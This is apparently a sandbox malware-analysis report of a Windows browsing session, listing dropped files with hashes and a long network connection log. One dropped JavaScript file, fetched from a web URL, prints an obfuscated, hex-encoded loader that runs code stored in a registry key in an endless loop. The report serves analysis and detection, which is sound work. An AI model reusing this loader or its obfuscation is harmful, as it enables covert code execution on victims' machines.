Preview:	L..................F.@.. ...$+.,......O.1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InWB.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnWF............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 14 18:34:11 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.987778490395478
Encrypted:	false
SSDEEP:	48:8YdATkO5fpEH3OidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbey+yT+:8Dp5fpaBT/TbxWOvTbey7T
MD5:	DE6B5E230734E1CF1D5088EEEF5F397C
SHA1:	4B319384E06FA26B038D6F863A0E914E6A40962D
SHA-256:	C6EF847A19C4931794755835E2CAD49DA6C97CA9A78165DA5D1209D4D62B41D3
SHA-512:	7BE5D87BED5142B9AA26A233DDB5150F035720C968780CEA61D13ABA078BDF897859E97ED3EECDFC01E1CCB087F59EDAD914A042E74C9D6866CA3C334041A2A3
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....^.-.1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InWB.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnWF............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\Downloads\7d5b7e5b-c7cc-4e66-827f-635d7cb0fae2.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (945)
Category:	dropped
Size (bytes):	2439
Entropy (8bit):	4.855158652694322
Encrypted:	false
SSDEEP:	48:IZDLyQ9QWI03TT0gvXaqqQL2RLWiitxWu8B3XaqsLcV0HxWg/3HR5jUk:kfQUT0+aqdESaHaqsxBRt1
MD5:	3256680C86571829FD21301E93012488
SHA1:	9247F86B6AD12598F0023578A4E4152D276A81C3
SHA-256:	52512A135563DB8B2EACF70D76F72CF27B1FA8B8BE3178A9FCD3E6824B6538BA
SHA-512:	54E73A5C8A811D65D1D15D954AD7FCD30036EBF436713058008DC22A2185607F9F56BC41952D8D166E39ADB8C426CF1F1EB7AE1323E8CDF62D56D4AF22C827AA
Malicious:	false
Reputation:	low
Preview:	.function uwslwq(zhrnpc, fytlgp) {. var attmad = '';. for (var i = 0; i < zhrnpc.length; i++) {. attmad += String.fromCharCode(zhrnpc.charCodeAt(i) ^ fytlgp.charCodeAt(i % fytlgp.length));. }. return attmad ;.};.function cclbfi(uoutvw) {. return decodeURIComponent('%' + uoutvw.match(/.{1,2}/g).join('%'));.};.var avtvjl = "766172206279647a7376203d2066756e6374696f6e28737472696e6729207b72657475726e206e65772046756e6374696f6e28737472696e672928297d3b76617220756972697465203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22293b7768696c6520287472756529207b747279207b6279647a7376287569726974652e52656752656164202822484b43555c5c536f6674776172655c5c436c61737365735c5c7a312229293b7569726974652e52656757726974652822484b43555c5c536f6674776172655c5c436c61737365735c5c7a31222c2022222c20225245475f535a22293b575363726970742e536c656570283130303030293b7d63617463682865727229207b7d3b7d3b";.var dqdeeu = "76617220726573706f6e7365203d2066756e6374696f6e206d6967756a7628746

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (945)
Category:	downloaded
Size (bytes):	2439
Entropy (8bit):	4.855158652694322
Encrypted:	false
SSDEEP:	48:IZDLyQ9QWI03TT0gvXaqqQL2RLWiitxWu8B3XaqsLcV0HxWg/3HR5jUk:kfQUT0+aqdESaHaqsxBRt1
MD5:	3256680C86571829FD21301E93012488
SHA1:	9247F86B6AD12598F0023578A4E4152D276A81C3
SHA-256:	52512A135563DB8B2EACF70D76F72CF27B1FA8B8BE3178A9FCD3E6824B6538BA
SHA-512:	54E73A5C8A811D65D1D15D954AD7FCD30036EBF436713058008DC22A2185607F9F56BC41952D8D166E39ADB8C426CF1F1EB7AE1323E8CDF62D56D4AF22C827AA
Malicious:	false
Reputation:	low
URL:	https://elanexoartspace.com/xeregry/
Preview:	.function uwslwq(zhrnpc, fytlgp) {. var attmad = '';. for (var i = 0; i < zhrnpc.length; i++) {. attmad += String.fromCharCode(zhrnpc.charCodeAt(i) ^ fytlgp.charCodeAt(i % fytlgp.length));. }. return attmad ;.};.function cclbfi(uoutvw) {. return decodeURIComponent('%' + uoutvw.match(/.{1,2}/g).join('%'));.};.var avtvjl = "766172206279647a7376203d2066756e6374696f6e28737472696e6729207b72657475726e206e65772046756e6374696f6e28737472696e672928297d3b76617220756972697465203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22293b7768696c6520287472756529207b747279207b6279647a7376287569726974652e52656752656164202822484b43555c5c536f6674776172655c5c436c61737365735c5c7a312229293b7569726974652e52656757726974652822484b43555c5c536f6674776172655c5c436c61737365735c5c7a31222c2022222c20225245475f535a22293b575363726970742e536c656570283130303030293b7d63617463682865727229207b7d3b7d3b";.var dqdeeu = "76617220726573706f6e7365203d2066756e6374696f6e206d6967756a7628746

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2023 20:34:03.343713999 CET	49674	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:03.343724012 CET	49675	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:03.483016968 CET	49673	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:11.001190901 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.001230955 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.001313925 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.001621962 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.001640081 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.002113104 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.002146959 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.002202034 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.002501011 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.002518892 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.354000092 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.354268074 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.354278088 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.354578018 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.354664087 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.355418921 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.355479956 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.356476068 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.356518030 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.356673002 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.356678963 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.360764027 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.360969067 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.360984087 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.362629890 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.362703085 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.363425970 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.363508940 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.363712072 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.363718987 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.493649960 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.556118965 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.688298941 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.688560963 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.688623905 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.688884974 CET	49705	443	192.168.2.5	142.251.33.78
Nov 14, 2023 20:34:11.688899040 CET	443	49705	142.251.33.78	192.168.2.5
Nov 14, 2023 20:34:11.692533016 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.692681074 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:11.692739010 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.693572998 CET	49706	443	192.168.2.5	172.217.14.205
Nov 14, 2023 20:34:11.693592072 CET	443	49706	172.217.14.205	192.168.2.5
Nov 14, 2023 20:34:12.763480902 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:12.763575077 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:12.763663054 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:12.763993979 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:12.764031887 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:12.945692062 CET	49675	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:12.945693970 CET	49674	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:12.977922916 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:12.977962017 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:12.978029013 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:12.984246016 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:12.984293938 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:12.984355927 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:12.985023975 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:12.985039949 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:12.985244989 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:12.985258102 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.089690924 CET	49673	443	192.168.2.5	23.1.237.91
Nov 14, 2023 20:34:13.098077059 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:13.098383904 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:13.098433971 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:13.100095987 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:13.100171089 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:13.101485014 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:13.101582050 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:13.151954889 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:13.151992083 CET	443	49709	142.250.217.100	192.168.2.5
Nov 14, 2023 20:34:13.201450109 CET	49709	443	192.168.2.5	142.250.217.100
Nov 14, 2023 20:34:13.341895103 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.342302084 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.342318058 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.342959881 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.342977047 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.343050957 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.343060017 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.343067884 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.343118906 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.343414068 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.343431950 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.344007969 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.344048977 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.344065905 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.344122887 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.344130993 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.344186068 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.345082998 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.345798016 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.345866919 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.346272945 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.346354961 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.346627951 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.346633911 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.390732050 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.390738964 CET	443	49711	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.390738964 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.437047005 CET	49711	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.660356998 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.661048889 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.661067963 CET	443	49710	142.251.211.238	192.168.2.5
Nov 14, 2023 20:34:13.661144018 CET	49710	443	192.168.2.5	142.251.211.238
Nov 14, 2023 20:34:13.819319010 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:13.819360971 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:13.819442034 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:13.819798946 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:13.819818020 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.144766092 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.145157099 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.145215034 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.146800995 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.146894932 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.150561094 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.150727034 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.150963068 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.150980949 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.199399948 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.460278034 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.460540056 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.460618973 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.464900017 CET	49714	443	192.168.2.5	142.251.33.102
Nov 14, 2023 20:34:14.464940071 CET	443	49714	142.251.33.102	192.168.2.5
Nov 14, 2023 20:34:14.626506090 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.626588106 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.626686096 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.627527952 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.627564907 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.942365885 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.942698002 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.942739010 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.943648100 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.943731070 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.945192099 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.945265055 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.945657969 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:14.945674896 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:14.993072987 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:15.336350918 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:15.336433887 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:15.336508989 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:15.337119102 CET	49715	443	192.168.2.5	67.199.248.10
Nov 14, 2023 20:34:15.337174892 CET	443	49715	67.199.248.10	192.168.2.5
Nov 14, 2023 20:34:15.763004065 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:15.763042927 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:15.763114929 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:15.770473003 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:15.770483971 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.085521936 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.085633039 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.095654964 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.095663071 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.095904112 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.150302887 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.194056988 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:16.194098949 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:16.194173098 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:16.201308012 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:16.201325893 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:16.235953093 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.281289101 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.388979912 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.389055967 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.389132023 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.389302969 CET	49716	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.389316082 CET	443	49716	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.438711882 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.438754082 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.438824892 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.439568043 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.439583063 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.685408115 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:16.685774088 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:16.685815096 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:16.687062979 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:16.687207937 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:16.749310017 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.749413013 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.750665903 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.750684977 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.750929117 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:16.752531052 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:16.797319889 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:17.052624941 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:17.052691936 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:17.052825928 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:17.054301023 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:17.054320097 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:17.054328918 CET	49718	443	192.168.2.5	23.60.72.63
Nov 14, 2023 20:34:17.054332972 CET	443	49718	23.60.72.63	192.168.2.5
Nov 14, 2023 20:34:17.100254059 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.100296021 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.100311041 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.100552082 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.141091108 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.141130924 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.184838057 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.330317020 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.330672026 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.330944061 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.333283901 CET	49717	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.333308935 CET	443	49717	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.339298010 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.339325905 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.339416027 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.340125084 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.340141058 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.812006950 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.812352896 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.812371969 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.812748909 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.813247919 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.813301086 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:17.813343048 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.853445053 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:17.853461027 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:19.340419054 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:19.340811014 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:19.341018915 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.077011108 CET	49719	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.077047110 CET	443	49719	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.304163933 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.304218054 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.304320097 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.304686069 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.304708004 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.400218964 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.400301933 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.400391102 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.400898933 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.400981903 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.401072025 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.401264906 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.401300907 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.401721001 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.401806116 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.766267061 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.766649008 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.766684055 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.767175913 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.767791033 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.767877102 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.767972946 CET	49720	443	192.168.2.5	50.31.176.165
Nov 14, 2023 20:34:21.813266039 CET	443	49720	50.31.176.165	192.168.2.5
Nov 14, 2023 20:34:21.845119953 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.845757961 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.845866919 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.845926046 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.846343040 CET	49722	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.846401930 CET	443	49722	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.847440004 CET	443	49721	68.66.224.58	192.168.2.5
Nov 14, 2023 20:34:21.847528934 CET	49721	443	192.168.2.5	68.66.224.58
Nov 14, 2023 20:34:21.847942114 CET	443	49722	68.66.224.58	192.168.2.5
